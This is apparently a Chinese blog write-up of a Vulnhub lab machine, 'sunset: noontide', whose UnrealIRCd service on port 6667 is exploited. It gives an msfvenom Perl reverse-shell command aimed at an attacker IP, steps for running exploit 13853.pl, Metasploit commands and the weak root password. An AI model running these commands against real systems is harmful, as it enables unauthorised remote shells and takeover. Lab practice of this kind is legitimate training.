vulhub-sunset:noontide

最新推荐文章于 2024-07-17 14:22:02 发布
最新推荐文章于 2024-07-17 14:22:02 发布
阅读量212 收藏 4
点赞数 7
文章标签: 服务器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2201_75378806/article/details/138808424
版权

这台靶机主要是irc渗透

irc介绍 https://en.wikipedia.org/wiki/List_of_Internet_Relay_Chat_commands#USERIP

  • IRC是Internet Relay Chat的英文缩写,中文称为互联网中继聊天,是一种网络聊天协议。

  • 端口号默认的是6667号端口

  • IRC的工作原理非常简单,您只要在自己的PC上运行客户端软件,然后通过因特网以IRC协议连接到一台IRC服务器上即可

常规namp扫描

知道了版本,让我们查一下

第一和第三个都挺感兴趣的,让我们试试远程下载

用msfvenom -p cmd/unix/reverse_perl LHOST=<attacker_IP> LPORT=4000 -f raw  生成一个perl的木马

下面就是如何利用了,先打开13853.pl

在第一个payload里面输入生成的payload,其它的原来的payload全删掉,记得-e后面记得加\,;后面加个\,不然你会反弹失败

现在运行改文件

perl 13853.pl <受害者的 IP> 6667 1 

运行有效负载 1

python -c 'import pty;pty.spawn(“/bin/bash”)'

root的密码是root(以后我就记得先试试rootroot弱密码)

上面的irc还可以使用msfsole

msfconsole

msf6 → search unrealircd

msf6 → use 0

msf6 → show options

msf6 → set rhosts 192.168.172.120

msf6 → set payload 7

msf6 → set lhost 192.168.45.239

kikifofo
关注
  • 7
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sunset: noontide靶机渗透-vulnhub
m0_68117643的博客
07-18 1012
这台靶机(sunsetnoontide)运行在Vmware中无法获取靶机IP,换VirtualBox后NAT和桥接模式下也未获取到IP,仅在host-only模式下才找到靶机IP 突破点:反弹shell—root弱口令提权
sundown-sunset:用于计算日落和日落时间的简单API
02-18
"sundown-sunset-master"可能包含测试用例,用来验证API在不同地理位置和日期下的正确性。开发者可以通过这些测试用例来确保API在各种情况下的表现。 在实际应用中,"sundown-sunset" API可以用于各种场景,如天气...
靶场实战(14):OSCP备考之VulnHub SUNSET NOONTIDE
OneMoreThink
01-12 952
打靶思路资产发现主机发现服务发现漏洞发现(获取权限)irc服务提升权限server用户sudosuidcron内核提权信息收集1、资产发现1.1、主机发现本次靶场SUNSET: NOONTIDE[1]指定IP,不涉及主机发现过程。1.2、服务发现使用命令sudo -u root 172.16.33.78 -n -Pn -p- --reason -sV -sC -O,发现主机开放的端口、提供的服务、...
实战打靶集锦-008- noontide
阿尔泰野狼的博客
02-26 430
本文记录了博主一次失败的打靶经历。
vulhub-sunset:dawn3
2201_75378806的博客
05-13 584
这台靶机的知识是win缓冲区溢出漏洞,本篇文章是按照b站红队笔记师傅视频学习的nmap 常规扫描,有个6812端口和21端口匿名登入ftp,下载dawn3.exefile,binwalk,strings先查看一下文件从输出中可以看到一些信息:PE32 是一种用于 32 位 Windows 操作系统的可执行文件格式"(console)" 表示这是一个控制台应用程序。
vulnhub sunset: noontide
箭雨镜屋
03-23 1729
nmap扫描 ---- searchsploit搜索payload ---- Metasploit利用UnrealIRCd漏洞得到shell ---- su命令弱密码提权
vulhub-sunset:decoy
2201_75378806的博客
05-09 648
常规端口扫描,有22,80。
vulhub-sunset:sundown
2201_75378806的博客
05-13 399
使用wpscan扫描,发现插件:wp-with-spritz(wp的插件也有爆出漏洞,平时渗透要注意)#创建自定义函数sys_exec 类型是integer,别名 soname 文件名(导入udf函数。goole搜搜漏洞该插件存在存在文件包含漏洞with Spritz 1.0 - 远程文件包含。读取一下wp-config文件,权限不够需要www-data网站权限,利用前面的文件包含。#将udf文件内容传入新建的udf文件中,这里的dumpfile要和查看的路劲一致。或者searchsploit。
vulhub-sunset:solstice
2201_75378806的博客
05-13 284
所以在网上找到apache2的访问日志可能保存的文件路径,挨个进行文件包含看看访问日志到底保存在哪里,最后发现在/var/log/apache2/access.log。由于这个php文件是由root运行的,并且我们有写权限,因此我们可以将文件的内容更改为恶意php代码,这将为我们提供反向shell。由于nmap扫描出80端口是apache httpd 2.4.38,可以试试apache日志中毒。我们将使用这个 php 代码来获取反向 shell,将 ip 更改为攻击者的 ip 并记住端口。
vulhub-Sunset:Twilight
2201_75378806的博客
05-09 144
指定了盐为 "a",最后的 "a" 是要加密的原始密码。先将原始原件下载到本地,方便有问题可以恢复。它还说我们对/passwd有写入权限。表示使用 MD5 加密算法,上传linpease。解密一下shadow。
sunrise-sunset:静态站点,可将的日出日落时间与地球上的地方进行比较
05-14
日出日落静态站点,可将的日出/日落时间与地球上的地方进行比较在查看网站这是什么? 我在布达佩斯长大,几年前移居荷兰。 我不能忽略这样一个事实,即太阳的模式截然不同:太阳升起的时间比布达佩斯晚。...
ember-initials:适用于Ember应用程序的高级头像生成器。 首字母:circled_M:,图像:sunset:,凹版:woman_light_skin_tone:和可爱:smiling_face_with_heart-eyes:所有您需要的用户个人资料!
04-25
Ember Initials是一个使用用户的姓名缩写,图像,凹版印刷或可爱的东西生成简单化身的程序包。 它绝对支持Ember 3.16(或更高版本)。 得益于高度可定制的界面,您可以定义默认值甚至设置后备。...
sunrise-sunset-map:PHP和ReactJS Sunrisesunset计算器。 Sunrisesunsetmap.com的源代码-Calculator source code
03-24
这是的源代码。 该网站最初建于2005年,甚至早于jQuery(当时IE6是主要的浏览器)。 它旨在在廉价的共享主机上运行。 直到最近,我还是将其搁置一旁,但现在已使用ReactJS和SCSS将其重建为现代标准,并使用Google...
Sunset-Hud:非常明亮的TF2 Hud
02-19
《太阳落山时的HUD:TF2的独特视觉体验——深入解析Sunset-Hud》 在电子游戏中,用户体验的细节往往能极大地影响游戏的整体感受。Team Fortress 2(简称TF2)作为一款深受玩家喜爱的第一人称射击游戏,其丰富的游戏...
自建SMTP服务器:如何保障安全稳定的发信?
最新发布
danplus的博客
07-17 264
自建SMTP服务器虽然可以提供更高的灵活性和控制力,但也需要投入大量的时间和精力来保障其安全和稳定。AokSend,指导您自建SMTP服务器,结合API接口,高效稳定,让邮件营销更加自主可控!
视频网站适用于什么服务器类型呢?
wanhengwangluo的博客
07-17 90
视频网站通常都会选择一些性能比较强大的服务器来保证网络视频能够进行流畅播放与用户的良好体验感,视频网站需要承载大量的视频数据处理与传输,所以选择的服务器需要具备强大的计算能力与网络处理能力,可以选择使用多核CPU和高速网络接口的服务器,来保证视频可以进行快速的下载。视频网站中的文件内存会比较大,为了可以存储大量的视频文件,所以网站需要具有足够存储空间的服务器,同时还要有着高可用性,确保业务的连续性与可靠性,不会出现服务器故障导致业务出现中断的情况。
Linux 命令 —— top命令(查看进程资源占用)
longool的博客
07-14 1065
top 命令是 Linux/Unix 系统中常用的进程监控工具,可以实时显示系统中各个进程的资源占用情况,是一个快照信息,包括CPU、内存等。进入 linux 系统,直接输入 top,回车,就会显示如下所示的信息。1、第一行:时间上的统计top - 15:10:50:表示当前系统的时间是15:10:50;up 10 min:表示系统当前已经运行了10分钟。user:表示当前登录系统的用户数为1。
Midnight = 1/2(Sunrise - Sunset)java表示
05-25
假设Sunrise和Sunset是以毫秒为单位表示的时间戳,可以使用以下Java代码计算Midnight: ``` long sunrise = /* 用毫秒表示的日出时间戳 */; long sunset = /* 用毫秒表示的日落时间戳 */; long midnight = (sunrise - sunset) / 2 + sunset; ``` 这里使用long类型来避免在计算过程中发生溢出。注意,这里的Midnight是以毫秒为单位表示的时间戳,需要将它转换为实际的时间格式,例如使用Java的Date类或者其他时间处理库。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值